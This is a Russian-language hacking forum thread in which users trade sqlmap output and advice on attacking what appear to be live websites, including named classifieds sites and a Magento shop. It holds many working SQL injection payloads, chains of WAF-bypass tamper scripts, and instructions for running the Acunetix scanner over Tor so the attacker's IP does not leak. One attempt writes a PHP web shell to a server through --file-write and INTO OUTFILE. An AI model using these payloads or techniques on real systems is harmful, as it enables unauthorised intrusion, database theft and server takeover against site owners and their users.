[03:59:10] [PAYLOAD] 7'/**/aNd/**/3241/**/iN/**/(seLECt/**/(CHaR(113)+CHaR(107)+CHaR(98)+CHaR(120)+CHaR(113)+ (seLECt/**/COUnt(SkhlmcPTBankDB..sysusers.name+CHaR(46)+Skhlm cPTBankDB..sysobjects.name/**/aS/**/table_name)/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/iNNER/**/JOiN/**/SkhlmcPTBankDB..sysusers/**/On/**/SkhlmcPTBankDB..sysobjects.uid=SkhlmcPTBankDB..sys users.uid/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(CHaR(117),CHaR(118)))+CHaR(113)+CHaR(112)+CHaR(11 2)+CHaR(107)+CHaR(113)))/**/aNd/**/'qpCU'='qpCU
[03:59:11] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:11] [WARNING] the SQL query provided does not return any output
[03:59:12] [PAYLOAD] 7'/**/uNiOn/**/All/**/selEct/**/NUll,NUll,NUll,NUll,NUll,NUll,cHAR(113)+cHAR(107)+ cHAR(98)+cHAR(120)+cHAR(113)+(selEct/**/table_schema+cHAR(46)+table_name/**/fROM/**/information_schema.tables/**/WHeRE/**/table_catalog=cHAR(83)+cHAR(107)+cHAR(104)+cHAR(10 8)+cHAR(109)+cHAR(99)+cHAR(80)+cHAR(84)+cHAR(66)+c HAR(97)+cHAR(110)+cHAR(107)+cHAR(68)+cHAR(66)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_NUll_VALUES)+cHAR(113)+cHAR(112)+cHAR(112) +cHAR(107)+cHAR(113),NUll,NUll--/**/XTJu
[03:59:12] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:13] [WARNING] reflective value(s) found and filtering out
[03:59:13] [PAYLOAD] 7'/**/unIOn/**/All/**/SElEcT/**/Null,Null,Null,Null,Null,Null,CHar(113)+CHar(107)+ CHar(98)+CHar(120)+CHar(113)+(SElEcT/**/name/**/FrOM/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=CHar(85)/**/fOr/**/JSON/**/AUTO,/**/INCLUDE_Null_VALUES)+CHar(113)+CHar(112)+CHar(112) +CHar(107)+CHar(113),Null,Null--/**/oEuh
[03:59:14] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:14] [PAYLOAD] 7'/**/uNiOn/**/ALl/**/SElecT/**/Null,Null,Null,Null,Null,Null,ChaR(113)+ChaR(107)+ ChaR(98)+ChaR(120)+ChaR(113)+COUnT(name)+ChaR(113) +ChaR(112)+ChaR(112)+ChaR(107)+ChaR(113),Null,Null/**/FrOm/**/SkhlmcPTBankDB..sysobjects/**/Where/**/xtype=ChaR(85)--/**/jzSk
[03:59:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:15] [WARNING] the SQL query provided does not return any output
[03:59:15] [PAYLOAD] 7'/**/ANd/**/6591/**/In/**/(seLEct/**/(chAR(113)+chAR(107)+chAR(98)+chAR(120)+chAR(113)+ (seLEct/**/CoUNT(name)/**/FROm/**/SkhlmcPTBankDB..sysobjects/**/WhERe/**/xtype=chAR(85))+chAR(113)+chAR(112)+chAR(112)+chAR (107)+chAR(113)))/**/ANd/**/'SuZW'='SuZW
[03:59:16] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:16] [WARNING] the SQL query provided does not return any output
[03:59:16] [INFO] fetching number of tables for database 'SkhlmcPTBankDB'
[03:59:16] [PAYLOAD] 7'/**/AnD/**/UniCODE(sUBstRInG((SeLeCt/**/ltriM(StR(cOUnT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(CHar(117),CHar(118))),1,1))/**/NOt/**/BETWEen/**/0/**/AnD/**/51/**/AnD/**/'dxUf'='dxUf
[03:59:17] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:17] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[03:59:17] [PAYLOAD] 7'/**/ANd/**/UnIcODe(sUbstRIng((SELeCT/**/LtRim(stR(cOunT(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wHeRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(ChAR(117),ChAR(118))),1,1))/**/Not/**/bEtwEeN/**/0/**/ANd/**/48/**/ANd/**/'dxUf'='dxUf
[03:59:18] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:18] [PAYLOAD] 7'/**/AnD/**/UnIcODE(SUBstRIng((sELect/**/LtRim(sTr(coUNt(name)))/**/FRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRE/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(chAr(117),chAr(118))),1,1))/**/NOt/**/bETweEN/**/0/**/AnD/**/9/**/AnD/**/'dxUf'='dxUf
[03:59:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:19] [INFO] retrieved:
[03:59:19] [DEBUG] performed 3 queries in 2.67 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[03:59:19] [DEBUG] used the default behavior, running in batch mode
[03:59:19] [PAYLOAD] 7'/**/iF(UNICOde(sUbstrInG((SELEcT/**/lTRiM(StR(Count(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/whERe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(cHAR(117),cHAR(118))),1,1))/**/noT/**/beTWeen/**/0/**/aND/**/51)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:19] [WARNING] time-based comparison requires larger statistical model, please wait.................. (done)
[03:59:35] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:35] [PAYLOAD] 7'/**/If(uNIcODE(SUbSTriNg((sELEct/**/LtrIM(stR(COunT(name)))/**/FroM/**/SkhlmcPTBankDB..sysobjects/**/wHere/**/SkhlmcPTBankDB..sysobjects.xtype/**/iN/**/(ChAr(117),ChAr(118))),1,1))/**/noT/**/betWEEN/**/0/**/AnD/**/48)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:35] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:59:36] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:36] [PAYLOAD] 7'/**/iF(UnicOdE(SubString((SElECt/**/lTRim(sTr(cOuNT(name)))/**/fRoM/**/SkhlmcPTBankDB..sysobjects/**/wheRe/**/SkhlmcPTBankDB..sysobjects.xtype/**/In/**/(Char(117),Char(118))),1,1))/**/Not/**/BEtwEEn/**/0/**/AnD/**/9)/**/WAITFOR/**/DELAY/**/'0:0:10'--
[03:59:37] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[03:59:37] [INFO] retrieved:
[03:59:37] [DEBUG] performed 3 queries in 17.57 seconds
[03:59:37] [INFO] resumed: 0
[03:59:37] [DEBUG] performed 0 queries in 0.00 seconds
[03:59:37] [CRITICAL] unable to retrieve the tables for any database
[03:59:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 13 times

man474019 said:
↑ (https://antichat.live/posts/4453576/)
WAF


После


Code:
--tamper=apostrophemask,apostrophenullencode,appendn ullbyte,base64encode,between,bluecoat,chardoubleen code,charencode,charunicodeencode,concat2concatws, equaltolike,greatest,halfversionedmorekeywords,ifn ull2ifisnull,modsecurityversioned,modsecurityzerov ersioned,multiplespaces,nonrecursivereplacement,pe rcentage,randomcase,randomcomments,securesphere,sp ace2comment,space2dash,space2hash,space2morehash,s pace2mssqlblank,space2mssqlhash,space2mysqlblank,s pace2mysqldash,space2plus,space2randomblank,sp_pas sword,unionalltounion,unmagicquotes,versionedkeywo rds,versionedmorekeywords

Выдал


Code:
[01:16:41] [CRITICAL] unable to retrieve the tables for any database
[01:16:41] [WARNING] HTTP error codes detected during run:
414 (Request-URI Too Long) - 4 times, 500 (Internal Server Error) - 1 times, 400 (Bad Request) - 1 times, 404 (Not Found) - 8 times
[01:16:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

Как можно обойти waf ?

Заранее спасибо!

grimnir said:
↑ (https://antichat.live/posts/4443159/)
Приветствую, если версия 12 и 13 (в 10 он просто в настройках включается GUI ) то вот выдержка из моего мануала
1)Если нужна работа через тор

качаем privoxy_3.0.28

правим конфиг

forward-socks5t / 127.0.0.1:9150 .

forward-socks4 / 127.0.0.1:9150 .

forward-socks4a / 127.0.0.1:9150 .

12)C:\ProgramData\Acunetix\shared\general в файле settings.xml ищем слово proxy

и меняем на 127.0.0.1 порт 8118

13)Необязательный пункт!!! Теперь при скане сайта дополнительно в веб интерфейсе для каждого скана идем в вкладку HTTP и прописываем 127.0.0.1 порт 8118 (этот пункт оказался не обязательным ,если настройки прописаны в settings.xml)

Проверить работу можно отключив тор- сайт не будет сканится.

========================

чтобы не было утечки айпи при работе через тор нужно отключить следующие тесты ,которые используют порты в обход тор

Server tests:

Apache Tomcat AJP protocol audit

JMX and RMI

Java Debug Wire Protocol (JDWP) audit

Open SSL TLS Heartbleed

PHP Hash Collision DOS

TLS/SSL audit

Target Tests:

Apache Cassandra

FastGI Unauthorized Access

Memcached

Oracle Weblogic T3 XXE

Redis Unath

webLogic RCE

Apache Log4j socket

uWSGI

UPD по поводу зависания веб. Веб вообще не участвует в скане ,это просто оболочка для wvsc.exe его (WEB-GUI) можно даже закрыть, и все равно сканы будут идти. Чтобы зависаний не было ,не ставьте на сайт макимум потоков , лучше 2 деление слева при начале скана. И комп на ссд + минимально 6 Гб оперы + обязательно не использовать дефолт профиль скана ,где включены тесты ДДос, если у вас цель стоит поиск ошибок ,а не положить сайт.



а есть где то полный мануал от тебя ?

Кто нибудь мапом обходил Imunify360 (CloudLinux) waf ?

Ошибка на отрицательный лимит

Подскажите, пожалуйста, отсканировал сайт Acunetix, нашел sql уязвимость, но sqlmap не может пробить ее, думаю из-за WAF. Как понять, какой tamper использовать, или же как вытащить необходимую информацию для sqlmap из Acunetix?

matthhy said:
↑ (https://antichat.live/posts/4458664/)
Подскажите, пожалуйста, отсканировал сайт Acunetix, нашел sql уязвимость, но sqlmap не может пробить ее, думаю из-за WAF. Как понять, какой tamper использовать, или же как вытащить необходимую информацию для sqlmap из Acunetix?


Это не много не так работает. Сначала необходимо раскрутить уязвимость самому, а потом автоматизировать процесс средствами sqlmap. Соответственно, что бы понять какой тампер использовать - раскрути сначала руками.

Пытаюсь сдампить данные и вот уже почти час у меня вот такое:

[INFO] fetching entries of column(s) 'email,passwort' for table....

Без каких либо движений. Может быть такое,что sqlmap долго считает колличество строк,если база большая?

sql на магенто

/result/?q=1'

Акунетикс нашел sql даже выдернур имя БД


Code:
Proof of Exploit
SQL query - SELECT database()

admin8sasdasd

При отправке через бурп

site/result/?q=1'

Ответ:


Code:
HTTP/1.1 503 Service Unavailable
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1

Trace:
Error log record number:
Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.

Но при попытки крутануть мапом! Не видит скулю(

Пробывал --text-only

Может какой темпер есть под магенто?

brown said:
↑ (https://antichat.live/posts/4464980/)
sql на магенто
/result/?q=1'
Акунетикс нашел sql даже выдернур имя БД

Code:
Proof of Exploit
SQL query - SELECT database()

admin8sasdasd

При отправке через бурп
site/result/?q=1'
Ответ:

Code:
HTTP/1.1 503 Service Unavailable
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''/result/''q=1'')' at line 1

Trace:
Error log record number:
Magento is a trademark of Magento Inc. Copyright © 2010 Magento Inc.

Но при попытки крутануть мапом! Не видит скулю(
Пробывал --text-only
Может какой темпер есть под магенто?


Тут надо руками смотреть, на что срабатывает эррор и руками под это дело подгонять уже тампер.

sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --current-user


Code:
[INFO] retrieved: 'root@localhost'

sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --file-write=C:/shell/shell.txt --file-dest=/var/www/shell.php

>>Не льет, хотя права есть

sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --technique=E --sql-shell

select user()


Code:
[INFO] retrieved: 'root@localhost'

select 'test' into outfile '/var/www/test.txt'


Code:
[WARNING] execution of non-query SQL statements is only available when stacked queries are supported

Что можно попробовать? Или в error-based inj не выполняется into outfile ? load_file работает

Рамос said:
↑ (https://antichat.live/posts/4467596/)
>>Не льет, хотя права есть


Привилегии типа FILE != правам на запись в директорию

+

вы не показали привилегии юзера, root@localhost не обязательно рутовый пользователь мускула,

но я думаю вы это знаете.


Рамос said:
↑ (https://antichat.live/posts/4467596/)
Или в error-based inj не выполняется into outfile ?


По идее должен, так как юнион, еррор и тд различаются по способу получения инфы, т.е. один и тот же запрос

может быть и union и error и time-based и blind и stack queries, правда это относится не ко всем запросам и субд.

Правда мне не совсем понятно, почему отработал первый запрос, но ошибка на второй, ну да ладно.


Рамос said:
↑ (https://antichat.live/posts/4467596/)
select user()

Code:
[INFO] retrieved: 'root@localhost'

select 'test' into outfile '/var/www/test.txt'

Code:
[WARNING] execution of non-query SQL statements is only available when stacked queries are supported



+


crlf said:
↑ (https://antichat.live/posts/4114489/)
Вот оно что, я его и в хвост и в гриву, а он не работает
Кстати, ещё из неприятных новостей, узнал только на днях. Оказывается в мускуле появилась опция
secure-file-priv
, которая начиная с какой-то версии,
по дефолту,
не даёт экспортиовать/импортировать файлы вне установленной директории (в
5.7.19
secure-file-priv="/var/lib/mysql-files/"). Т.е. если юзер имеет file_priv, то пока в
my.cnf
, либо при старте не будет явно указано
secure-file-priv=""
, операции, затрагивающие работу с локальной файловой системой (LOAD_FILE, INTO OUTFILE), не будут работать вне установленной директории. Для того чтобы узнать значение, нужно выполнить запрос "
SELECT @@secure_file_priv;
".
https://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_secure_file_priv



В вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор.

Baskin-Robbins said:
↑ (https://antichat.live/posts/4467763/)
В вашем случае можно попробовать залить файл в другие директории, либо поискать другой вектор.


sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --privileges -U CU


Code:
[23:12:06] [INFO] fetching current user
[23:12:07] [INFO] retrieved: 'root@localhost'

'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

@@secure_file_priv


Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '

--technique=E


Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E

[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

--technique=B


Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B

[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

С правами все нормально, не могу понять только почему не выполняется into outfile

Рамос said:
↑ (https://antichat.live/posts/4467799/)
@@secure_file_priv

Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select @@secure_file_priv;"
[23:18:45] [INFO] fetching SQL SELECT statement query output: 'select @@secure_file_priv'
[23:18:45] [INFO] resumed: ' '
select @@secure_file_priv: ' '

--technique=E

Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=E

[23:21:25] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

--technique=B

Code:
sqlmap.py -r test.txt --dbms=MySQL --risk=3 --level=5 -p password --sql-query="select 123 into outfile '/tmp/test.txt'" --technique=B

[23:22:31] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

С правами все нормально, не могу понять только почему не выполняется into outfile


ну для начала стоит поставить точку с запятой в последние запросы)) хотя мб в склмап это не нужно,

давно не юзал.

+

https://github.com/sqlmapproject/sqlmap/issues/619

Вообще ошибка на stacked queries, а в мускуле таких инъекций нет,

не знаю, я бы включил verbose на максимум, попробовал руками.

Больше, наверное, ничем не смогу помочь.

Baskin-Robbins said:
↑ (https://antichat.live/posts/4467812/)
Вообще ошибка на stacked queries, а в мускуле таких инъекций нет,
не знаю, я бы включил verbose на максимум, попробовал руками.


Тогда уже тут я бессылен. Либо нужно идти в другую тему или забить)

SELECT user();

qwe' AND EXTRACTVALUE(2410,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'Elwc'='Elwc


Code:
General error: 1105 XPATH syntax error: '\qjpjqroot@localhostqvbzq'


SELECT 123 INTO OUTFILE '/tmp/test.txt';

qwe' AND EXTRACTVALUE(4149,CONCAT(0x5c,0x716a706a71,(SELECT MID((IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71)) AND 'DLgP'='DLgP


Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,21)),0x7176627a71))' at line 1

qwe' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(123 INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x617364 ELSE 0x28 END)) AND 'yCEr'='yCEr


Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'INTO OUTFILE 0x2f746d702f746573742e747874 AS NCHAR),0x20)),1,1))>1) THEN 0x61736' at line 1

qwe' LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -


Code:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'LIMIT 0,1 INTO OUTFILE '/tmp/test.txt' LINES TERMINATED BY 0x313233-- -')' at line 1

IIS/dbms:mssql

boolean-based blind/error-based

1. при technique=B --is-dba=true при technique=E --is-dba=false. почему?

2. при выводе таблиц (technique=E) [WARNING] the SQL query provided does not return any output(с выводом бд все норм) common-tables выручает, но так как сайт самопис находит только 5 таблиц.

как заставить скульмап вывести таблицы ?

Parameter: #1* ((custom) POST)

Type: error-based

Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)

Payload: cat=-5625) OR 3972=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118 )+CHAR(113),(SELECT (CASE WHEN (3972=3972) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(98)+CHAR(98)+CHAR(118)+CHAR(1 13)) AND (8607=8607

Vector: OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')

---

[INFO] fetching tables for database: db1

[PAYLOAD] -1789

[PAYLOAD] -6678) OR 4206=CONCAT(CHAR(113)+CHAR(112)+CHAR(122)+CHAR(118 )+CHAR(113),(SELECT COUNT(db1..sysusers.name+CHAR(46)+db1..sysobjects. name AS table_name) FROM db1..sysobjects INNER JOIN db1..sysusers ON db1..sysobjects.uid=db1..sysusers.uid WHERE db1..sysobjects.xtype IN (CHAR(117),CHAR(118))),CHAR(113)+CHAR(98)+CHAR(98) +CHAR(118)+CHAR(113)) AND (2349=2349

[WARNING] the SQL query provided does not return any output

man474019 said:
↑ (https://antichat.live/posts/4468204/)
не могу дампит table_names, column_names
Spoiler: sqlmap1
python3 sqlmap.py -u "
https://front.am/category/construction_repairs/windows_doors?maxPrice=1&minPrice=1*
" --batch --random-agent --level=4 --risk=3 --dbs
Spoiler: sqlmap2
python3 sqlmap.py -u "
https://www.list.am/am/category/117?cnd=2&crc=1&n=49&po=1&price1=1&price2=1&sid=68*&type=1
" --batch --random-agent --level=4 --risk=3 --tamper="between,randomcase,space2comment" --fresh-queries --dbs --no-cast
WAF CloudFlare, подскажите плз как сделать ?


С клаудом туго, в открытом доступе тамперов под него нету. Как вариант искать реальный ИП ,что не всегда у получается

Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://' AND 7389=7389-- qoxM

Vector: AND [INFERENCE]

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://' AND (SELECT 9965 FRO
M (SELECT(SLEEP(5)))umCy)-- CigK
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
,0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
,NULL,NULL,NULL,CONCAT(0x716a707171,0x565a7070474f 77495945716a52566b686252457372
674b776e694f6f6877554c4b564f4b6a4c464a,0x716a7a707 1)-- -
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY]-- -
---
[06:15:30] [INFO] testing MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.02 seconds
[06:15:30] [INFO] confirming MySQL
[06:15:30] [DEBUG] performed 0 queries in 0.00 seconds
[06:15:30] [PAYLOAD] -8917' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:32] [DEBUG] turning off NATIONAL CHARACTER casting
[06:15:32] [PAYLOAD] -8379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,(CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END),0x716a7a707
1)-- -
[06:15:34] [DEBUG] performed 2 queries in 4.32 seconds
[06:15:34] [DEBUG] performed 0 queries in 0.01 seconds
[06:15:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:15:34] [INFO] fetching tables for database: 'DB'
[06:15:34] [PAYLOAD] -9852' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_ name)),0x716a7a7071) FROM INFO
RMATION_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:37] [PAYLOAD] -6604' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM INFORMATION
_SCHEMA.TABLES WHERE table_schema IN (0x70617266756d)-- -
[06:15:40] [WARNING] the SQL query provided does not return any output
[06:15:40] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[06:15:40] [PAYLOAD] -6180' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,JSON_ARRAYAGG(CONCAT_WS(0x6f6b6c6a646f,table_ name)),0x716a7a7071) FROM mysq
l.innodb_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:43] [PAYLOAD] -8023' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a70
7171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716a7a7071) FROM mysql.innod
b_table_stats WHERE database_name IN (0x70617266756d)-- -
[06:15:45] [WARNING] the SQL query provided does not return any output
[06:15:45] [INFO] fetching number of tables for database 'DB'
[06:15:45] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>51-- ZVRv
[06:15:48] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>48-- ZVRv
[06:15:51] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70617266756d),
1,1))>9-- ZVRv
[06:15:52] [INFO] retrieved:
[06:15:52] [DEBUG] performed 3 queries in 6.77 seconds
multi-threading is considered unsafe in time-based data retrieval. Are you sure
of your choice (breaking warranty) [y/N] N
[06:15:52] [DEBUG] used the default behavior, running in batch mode
[06:15:52] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>51,0,5)))))HoOT)-- oDuA
[06:15:52] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................... (done)
[06:16:00] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
more)
[06:16:01] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>48,0,5)))))HoOT)-- oDuA
[06:16:01] [WARNING] it is very important to not stress the network connection d
uring usage of time-based payloads to prevent potential disruptions
[06:16:02] [PAYLOAD] beauty' AND (SELECT 3461 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema=0x70617266756d),1,1))>9,0,5)))))HoOT)-- oDuA
[06:16:03] [INFO] retrieved:
[06:16:03] [DEBUG] performed 3 queries in 11.19 seconds
[06:16:03] [WARNING] unable to retrieve the number of tables for database 'parfu
m'
[06:16:03] [INFO] fetching number of tables for database 'DB'
[06:16:03] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>51-- LERK
[06:16:05] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>48-- LERK
[06:16:06] [DEBUG] turning off reflection removal mechanism (for optimization pu
rposes)
[06:16:06] [PAYLOAD] beauty' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) A
S CHAR),0x20) FROM mysql.innodb_table_stats WHERE database_name=0x70617266756d),
1,1))>9-- LERK
[06:16:07] [INFO] retrieved:
[06:16:07] [DEBUG] performed 3 queries in 3.66 seconds
[06:16:07] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>51,0,5)))))FEKR)-- xICj
[06:16:08] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>48,0,5)))))FEKR)-- xICj
[06:16:09] [PAYLOAD] beauty' AND (SELECT 5113 FROM (SELECT(SLEEP(5-(IF(ORD(MID((
SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM mysql.innodb_table_stat
s WHERE database_name=0x70617266756d),1,1))>9,0,5)))))FEKR)-- xICj
[06:16:10] [INFO] retrieved:
[06:16:10] [DEBUG] performed 3 queries in 3.23 seconds
[06:16:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[06:16:10] [DEBUG] used the default behavior, running in batch mode
No tables found

brown said:
↑ (https://antichat.live/posts/4477168/)

Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://' AND 7389=7389-- qoxM

Vector: AND [INFERENCE]

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://' AND (SELECT 9965 FRO
M (SELECT(SLEEP(5)))umCy)-- CigK
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE]
,0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://:80/blog/category/-2990' UNION ALL SELECT NULL
